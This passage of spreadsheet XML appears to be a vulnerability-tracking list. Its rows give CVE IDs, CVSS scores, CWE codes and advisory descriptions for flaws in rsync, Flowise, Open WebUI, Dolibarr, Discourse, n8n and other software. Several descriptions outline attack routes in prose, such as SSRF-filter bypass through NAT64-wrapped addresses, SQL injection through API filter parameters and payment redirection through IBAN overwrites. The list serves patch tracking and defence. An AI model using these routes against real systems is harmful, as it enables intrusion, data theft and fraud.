      <c r="F3200" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G3200" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H3200" s="5" t="inlineStr"/>
      <c r="I3200" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3200" s="5" t="inlineStr"/>
      <c r="K3200" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L3200" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows DWM Core Library allows an authorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="M3200" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69775</t>
        </is>
      </c>
    </row>
    <row r="3201">
      <c r="A3201" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3201" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70462</t>
        </is>
      </c>
      <c r="C3201" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3201" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3201" s="5" t="inlineStr"/>
      <c r="F3201" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3201" s="5" t="inlineStr"/>
      <c r="H3201" s="5" t="inlineStr"/>
      <c r="I3201" s="5" t="inlineStr">
        <is>
          <t>2026-08-13</t>
        </is>
      </c>
      <c r="J3201" s="5" t="inlineStr"/>
      <c r="K3201" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-835</t>
        </is>
      </c>
      <c r="L3201" s="5" t="inlineStr">
        <is>
          <t>rsync 3.1.0 before 3.5.0 contains a signed integer overflow vulnerability in the I/O timeout implementation that allows attackers to permanently disable connection timeouts by injecting MSG_IO_TIMEOUT messages carrying non-positive (zero or negative) values. Attackers can craft malicious MSG_IO_TIMEOUT messages that cause the timeout variable to wrap to a non-positive value, preventing the timeout check from firing and enabling idle or stalled connections to hold daemon slots indefinitely, leading to resource exhaustion.</t>
        </is>
      </c>
      <c r="M3201" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70462</t>
        </is>
      </c>
    </row>
    <row r="3202">
      <c r="A3202" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3202" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70471</t>
        </is>
      </c>
      <c r="C3202" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3202" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3202" s="5" t="inlineStr"/>
      <c r="F3202" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3202" s="5" t="inlineStr"/>
      <c r="H3202" s="5" t="inlineStr"/>
      <c r="I3202" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3202" s="5" t="inlineStr"/>
      <c r="K3202" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3202" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag-and-drop user interface for building customized large language model (LLM) flows. Prior to 3.1.3, Flowise injects $vars into the code execution sandbox without requiring variables:view, bypassing the permission-protected Variables API. Variables for the active workspace are fetched at packages/components/src/utils.ts and runtime variables are resolved from server environment variables, while the official variables route enforces variables:view. A user or API key that is denied variables:view can call /api/v1/node-custom-function and receive $vars pre-populated with all variables for the workspace, including Variable.name to Variable.value static variables and Variable.name to process.env[Variable.name] runtime variables. This can expose secrets such as database passwords, JWT secrets, SMTP passwords, and cloud keys, depending on the workspace Variables configuration. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3202" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70471</t>
        </is>
      </c>
    </row>
    <row r="3203">
      <c r="A3203" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3203" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70472</t>
        </is>
      </c>
      <c r="C3203" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3203" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3203" s="5" t="inlineStr"/>
      <c r="F3203" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3203" s="5" t="inlineStr"/>
      <c r="H3203" s="5" t="inlineStr"/>
      <c r="I3203" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3203" s="5" t="inlineStr"/>
      <c r="K3203" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-863</t>
        </is>
      </c>
      <c r="L3203" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, Flowise openai-assistants-vector-store endpoints accept a client-controlled credential parameter and load credentials by id without checking whether that credential belongs to the caller workspace. Route permissions assistants:* only check feature access. The controller passes req.query.credential straight to the service, and the service uses findOneBy({ id: credentialId }), decrypts the credential, and calls OpenAI APIs without a workspaceId check. If an attacker knows another workspace credentialId, the attacker can use that workspace OpenAI key, read, modify, or delete victim vector stores and files, cause billing impact on the victim OpenAI account, and violate multi-tenant boundaries. This issue is fixed in version 3.1.3.</t>
        </is>
      </c>
      <c r="M3203" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70472</t>
        </is>
      </c>
    </row>
    <row r="3204">
      <c r="A3204" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3204" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70475</t>
        </is>
      </c>
      <c r="C3204" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3204" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3204" s="5" t="inlineStr"/>
      <c r="F3204" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3204" s="5" t="inlineStr"/>
      <c r="H3204" s="5" t="inlineStr"/>
      <c r="I3204" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3204" s="5" t="inlineStr"/>
      <c r="K3204" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3204" s="5" t="inlineStr">
        <is>
          <t>Flowise is a drag &amp; drop user interface to build a customized large language model flow. Prior to 3.1.3, the PUT /api/v1/executions/:id endpoint in packages/server/src/routes/executions/index.ts lacks the checkAnyPermission() middleware that protects other execution endpoints. Any authenticated user, regardless of assigned permissions, can modify execution state, data, and metadata of any execution in their workspace, enabling privilege escalation and manipulation of workflow execution results. This issue is fixed in 3.1.3.</t>
        </is>
      </c>
      <c r="M3204" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70475</t>
        </is>
      </c>
    </row>
    <row r="3205">
      <c r="A3205" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3205" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70485</t>
        </is>
      </c>
      <c r="C3205" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3205" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3205" s="5" t="inlineStr"/>
      <c r="F3205" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3205" s="5" t="inlineStr"/>
      <c r="H3205" s="5" t="inlineStr"/>
      <c r="I3205" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J3205" s="5" t="inlineStr"/>
      <c r="K3205" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3205" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.0 until 0.11.0, Open WebUI checked whether a user-supplied URL destination was globally routable by applying ipaddress.is_global to the literal IPv6 address without examining IPv4 addresses embedded in transition encodings. On a deployment with a NAT64 gateway, any verified user could wrap an internal or cloud-metadata IPv4 address in the NAT64 well-known prefix, pass the filter, and receive the internal response body through RAG URL ingestion, URL-to-markdown conversion, or web-search content retrieval. This issue is fixed in 0.11.0.</t>
        </is>
      </c>
      <c r="M3205" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70485</t>
        </is>
      </c>
    </row>
    <row r="3206">
      <c r="A3206" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3206" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71415</t>
        </is>
      </c>
      <c r="C3206" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3206" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3206" s="5" t="inlineStr"/>
      <c r="F3206" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3206" s="5" t="inlineStr"/>
      <c r="H3206" s="5" t="inlineStr"/>
      <c r="I3206" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3206" s="5" t="inlineStr"/>
      <c r="K3206" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3206" s="5" t="inlineStr">
        <is>
          <t>Kirby is an open-source content management system. From 5.0.0 until 5.5.2, Kirby's REST API chunk upload handler in src/Api/Upload.php did not run the relevant upload authorization preflight in Kirby\Api\Upload::process() before Kirby\Api\Upload::processChunk() persisted chunk data. An authenticated user with the access.panel permission enabled but with files.create, files.replace, and user/users.update permissions disabled could submit requests with an Upload-Length header and leave unfinished chunks in site/cache/.uploads for 24 hours. Repeating this process could consume attacker-controlled temporary storage, prevent other users from uploading files, or prevent site logic from storing data, although final permission checks still prevented unauthorized files from reaching the content or site/accounts directories. This issue is fixed in version 5.5.2.</t>
        </is>
      </c>
      <c r="M3206" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71415</t>
        </is>
      </c>
    </row>
    <row r="3207">
      <c r="A3207" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3207" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71505</t>
        </is>
      </c>
      <c r="C3207" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3207" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3207" s="5" t="inlineStr"/>
      <c r="F3207" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3207" s="5" t="inlineStr"/>
      <c r="H3207" s="5" t="inlineStr"/>
      <c r="I3207" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3207" s="5" t="inlineStr"/>
      <c r="K3207" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3207" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API third-party site account write routes that allows authenticated attackers with third-party creation rights to overwrite the WebPortal password of any company by bypassing per-object access checks that are only enforced on read routes. Attackers can replace the victim company's WebPortal password through the write endpoint, authenticate as that company to access its invoice data, and also obtain the victim's previous password verifier from the API response.</t>
        </is>
      </c>
      <c r="M3207" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71505</t>
        </is>
      </c>
    </row>
    <row r="3208">
      <c r="A3208" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3208" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71507</t>
        </is>
      </c>
      <c r="C3208" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3208" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3208" s="5" t="inlineStr"/>
      <c r="F3208" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3208" s="5" t="inlineStr"/>
      <c r="H3208" s="5" t="inlineStr"/>
      <c r="I3208" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3208" s="5" t="inlineStr"/>
      <c r="K3208" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3208" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a broken object-level authorization vulnerability in the REST API company bank account write routes that allows authenticated attackers with third-party creation rights to create, replace, or delete bank account details of any company without requiring read access to that company. Attackers can inject attacker-controlled IBANs as creditor accounts, which are then written into regenerated SEPA credit-transfer files, redirecting outgoing payments to attacker-controlled accounts.</t>
        </is>
      </c>
      <c r="M3208" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71507</t>
        </is>
      </c>
    </row>
    <row r="3209">
      <c r="A3209" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3209" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71508</t>
        </is>
      </c>
      <c r="C3209" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3209" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3209" s="5" t="inlineStr"/>
      <c r="F3209" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3209" s="5" t="inlineStr"/>
      <c r="H3209" s="5" t="inlineStr"/>
      <c r="I3209" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3209" s="5" t="inlineStr"/>
      <c r="K3209" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3209" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the user REST API update endpoint that allows attackers with user-write rights to modify payroll fields by exploiting an incomplete credential denylist that omits payroll columns. Attackers can rewrite salary, bonus, hourly rate, daily rate, and weekly hours for any user without holding payroll rights, with the modified values appearing in payroll export reports.</t>
        </is>
      </c>
      <c r="M3209" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71508</t>
        </is>
      </c>
    </row>
    <row r="3210">
      <c r="A3210" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3210" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71509</t>
        </is>
      </c>
      <c r="C3210" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3210" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3210" s="5" t="inlineStr"/>
      <c r="F3210" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3210" s="5" t="inlineStr"/>
      <c r="H3210" s="5" t="inlineStr"/>
      <c r="I3210" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3210" s="5" t="inlineStr"/>
      <c r="K3210" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3210" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains an improper authorization vulnerability in the expense report REST API update endpoint that allows authenticated attackers with expense-creation rights to bypass the approval workflow by directly setting approval status and approver identity fields. Attackers can manipulate workflow state fields through the REST API to advance expense reports to approved or closed status without possessing the dedicated approval right, while also creating forensic inconsistencies in audit records due to missing approval timestamps.</t>
        </is>
      </c>
      <c r="M3210" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71509</t>
        </is>
      </c>
    </row>
    <row r="3211">
      <c r="A3211" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3211" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71510</t>
        </is>
      </c>
      <c r="C3211" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3211" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3211" s="5" t="inlineStr"/>
      <c r="F3211" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3211" s="5" t="inlineStr"/>
      <c r="H3211" s="5" t="inlineStr"/>
      <c r="I3211" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3211" s="5" t="inlineStr"/>
      <c r="K3211" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="L3211" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a SQL injection vulnerability in the users REST API that allows authenticated attackers with user-read rights to extract sensitive data by splicing unsanitized filter parameters into SQL WHERE clauses without column restrictions. Attackers can perform binary search on numeric fields and LIKE prefix iteration on string fields to recover salary figures and password verifiers omitted from normal API responses, while raw database error messages in the same endpoint enable column name enumeration.</t>
        </is>
      </c>
      <c r="M3211" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71510</t>
        </is>
      </c>
    </row>
    <row r="3212">
      <c r="A3212" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3212" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71511</t>
        </is>
      </c>
      <c r="C3212" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3212" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3212" s="5" t="inlineStr"/>
      <c r="F3212" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3212" s="5" t="inlineStr"/>
      <c r="H3212" s="5" t="inlineStr"/>
      <c r="I3212" s="5" t="inlineStr">
        <is>
          <t>2026-08-24</t>
        </is>
      </c>
      <c r="J3212" s="5" t="inlineStr"/>
      <c r="K3212" s="5" t="inlineStr">
        <is>
          <t>CWE-522</t>
        </is>
      </c>
      <c r="L3212" s="5" t="inlineStr">
        <is>
          <t>Dolibarr before 24.0.0 contains a sensitive data exposure vulnerability in the Members REST API that allows authenticated attackers with member-read rights to retrieve bcrypt password verifiers by querying member endpoints. Attackers can call the individual member or member list endpoints to obtain crypted password verifier fields that are not filtered by the base API serializer or the Members API class, potentially enabling offline password cracking attacks.</t>
        </is>
      </c>
      <c r="M3212" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71511</t>
        </is>
      </c>
    </row>
    <row r="3213">
      <c r="A3213" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3213" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71553</t>
        </is>
      </c>
      <c r="C3213" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3213" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3213" s="5" t="inlineStr"/>
      <c r="F3213" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3213" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H3213" s="5" t="inlineStr"/>
      <c r="I3213" s="5" t="inlineStr">
        <is>
          <t>2026-08-17</t>
        </is>
      </c>
      <c r="J3213" s="5" t="inlineStr"/>
      <c r="K3213" s="5" t="inlineStr">
        <is>
          <t>CWE-1321</t>
        </is>
      </c>
      <c r="L3213" s="5" t="inlineStr">
        <is>
          <t>ApostropheCMS is an open-source Node.js content management system. In 4.32.0 and earlier, PATCH /api/v1/article/:id accepts the inherited path toString.call and passes it through the utility module to apos.util.set() and apos.util.get(), allowing an authenticated editor to overwrite the shared Object.prototype.toString function's call property and cause a persistent process-wide denial of service until restart.</t>
        </is>
      </c>
      <c r="M3213" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71553</t>
        </is>
      </c>
    </row>
    <row r="3214">
      <c r="A3214" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3214" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71556</t>
        </is>
      </c>
      <c r="C3214" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3214" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3214" s="5" t="inlineStr"/>
      <c r="F3214" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3214" s="5" t="inlineStr"/>
      <c r="H3214" s="5" t="inlineStr"/>
      <c r="I3214" s="5" t="inlineStr">
        <is>
          <t>2026-08-07</t>
        </is>
      </c>
      <c r="J3214" s="5" t="inlineStr"/>
      <c r="K3214" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3214" s="5" t="inlineStr">
        <is>
          <t>go-git is an extensible git implementation library written in pure Go. Prior to 5.19.2 and 6.0.0-alpha.5, worktree operations (including checkout, status, and add) resolve symbolic links inside the working tree without confining resolution to the worktree boundary, so a maliciously crafted repository containing a symlink can cause go-git to read from or write to files outside the intended working directory when the repository is cloned and its worktree operations are used. Versions 5.19.2 and 6.0.0-alpha.5.</t>
        </is>
      </c>
      <c r="M3214" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71556</t>
        </is>
      </c>
    </row>
    <row r="3215">
      <c r="A3215" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3215" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71964</t>
        </is>
      </c>
      <c r="C3215" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3215" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3215" s="5" t="inlineStr"/>
      <c r="F3215" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3215" s="5" t="inlineStr"/>
      <c r="H3215" s="5" t="inlineStr"/>
      <c r="I3215" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3215" s="5" t="inlineStr"/>
      <c r="K3215" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3215" s="5" t="inlineStr">
        <is>
          <t>CyberPanel 2.4.3, fixed in commit eca0c3c, contains an arbitrary file read vulnerability in the file manager component that allows authenticated attackers to read sensitive system files by uploading a crafted ZIP archive containing symbolic links. Attackers can exploit the application's failure to validate symlinks before extraction, causing symbolic links targeting arbitrary filesystem paths outside the user's home directory to persist on disk and be accessed through the web interface.</t>
        </is>
      </c>
      <c r="M3215" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71964</t>
        </is>
      </c>
    </row>
    <row r="3216">
      <c r="A3216" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3216" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72694</t>
        </is>
      </c>
      <c r="C3216" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3216" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3216" s="5" t="inlineStr"/>
      <c r="F3216" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3216" s="5" t="inlineStr"/>
      <c r="H3216" s="5" t="inlineStr"/>
      <c r="I3216" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3216" s="5" t="inlineStr"/>
      <c r="K3216" s="5" t="inlineStr">
        <is>
          <t>CWE-59</t>
        </is>
      </c>
      <c r="L3216" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in MRTG. When the MRTG daemon is started as a root user and subsequently drops privileges, a local, low-privileged attacker can exploit a symbolic link (symlink) following vulnerability. By influencing or pre-placing a symlink in the process ID (PID) file path, the attacker can trick the root process into changing the ownership of an arbitrary existing file to the daemon user. This can lead to local privilege escalation, allowing unauthorized access to or modification of sensitive files.</t>
        </is>
      </c>
      <c r="M3216" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72694</t>
        </is>
      </c>
    </row>
    <row r="3217">
      <c r="A3217" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3217" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72731</t>
        </is>
      </c>
      <c r="C3217" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3217" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3217" s="5" t="inlineStr"/>
      <c r="F3217" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3217" s="5" t="inlineStr"/>
      <c r="H3217" s="5" t="inlineStr"/>
      <c r="I3217" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3217" s="5" t="inlineStr"/>
      <c r="K3217" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="L3217" s="5" t="inlineStr">
        <is>
          <t>Discourse is an open-source discussion platform. From 2026.1.0-latest until 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1, anyone able to run a parameterized Data Explorer query, including non-staff members of a group a query is shared with, could craft parameter values that escaped the intended query and executed arbitrary SQL through plugins/discourse-data-explorer/lib/discourse_data_explorer/data_explorer.rb and plugins/discourse-data-explorer/lib/discourse_data_explorer/workflows/sql_action/v1.rb. Recursive parameter interpolation allowed one parameter value to introduce another parameter, and parameter declarations in SQL comments could be used to inject a statement. Queries run in a read-only transaction, so data could not be modified, but any table could be read. This issue is fixed in versions 2026.1.7, 2026.6.2, 2026.7.1, and 2026.8.0-latest.1.</t>
        </is>
      </c>
      <c r="M3217" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72731</t>
        </is>
      </c>
    </row>
    <row r="3218">
      <c r="A3218" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3218" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72774</t>
        </is>
      </c>
      <c r="C3218" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3218" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3218" s="5" t="inlineStr"/>
      <c r="F3218" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3218" s="5" t="inlineStr"/>
      <c r="H3218" s="5" t="inlineStr"/>
      <c r="I3218" s="5" t="inlineStr">
        <is>
          <t>2026-08-11</t>
        </is>
      </c>
      <c r="J3218" s="5" t="inlineStr"/>
      <c r="K3218" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="L3218" s="5" t="inlineStr">
        <is>
          <t>n8n before 1.123.67, 2.31.5, and 2.32.1 contains a credential authorization bypass in the HTTP Request node. An authenticated member with edit access to a shared workflow can reference another user's credential while specifying the credential type via an expression. Because the pre-execution permission check compares the unresolved expression instead of the resolved credential type, the ownership check is skipped and the credential is loaded at execution time, allowing the member to use or exfiltrate a credential they were not granted. Exploitation requires knowing the target credential's identifier.</t>
        </is>
      </c>
      <c r="M3218" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72774</t>
        </is>
      </c>
    </row>
    <row r="3219">
      <c r="A3219" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3219" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72838</t>
        </is>
      </c>
      <c r="C3219" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3219" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3219" s="5" t="inlineStr"/>
      <c r="F3219" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3219" s="5" t="inlineStr"/>
      <c r="H3219" s="5" t="inlineStr"/>
      <c r="I3219" s="5" t="inlineStr">
        <is>
          <t>2026-08-14</t>
        </is>
      </c>
      <c r="J3219" s="5" t="inlineStr"/>
      <c r="K3219" s="5" t="inlineStr">
        <is>
          <t>CWE-770</t>
        </is>
      </c>
      <c r="L3219" s="5" t="inlineStr">
        <is>
          <t>FileBrowser versions before 2.63.19 fail to enforce the declared Upload-Length in the TUS resumable-upload PATCH endpoint, allowing authenticated users to write arbitrary data to disk. Attackers can send oversized request bodies that exceed the declared upload length to exhaust available disk space and cause service unavailability.</t>
        </is>
      </c>
      <c r="M3219" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72838</t>
        </is>
      </c>
    </row>
    <row r="3220">
      <c r="A3220" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B3220" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72909</t>
        </is>
      </c>
      <c r="C3220" s="5" t="n">
        <v>7.1</v>
      </c>
      <c r="D3220" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E3220" s="5" t="inlineStr"/>
      <c r="F3220" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3220" s="5" t="inlineStr"/>
      <c r="H3220" s="5" t="inlineStr"/>
      <c r="I3220" s="5" t="inlineStr">
        <is>
          <t>2026-08-10</t>
        </is>
      </c>
      <c r="J3220" s="5" t="inlineStr"/>
      <c r="K3220" s="5" t="inlineStr">
        <is>
          <t>CWE-284</t>
        </is>
      </c>
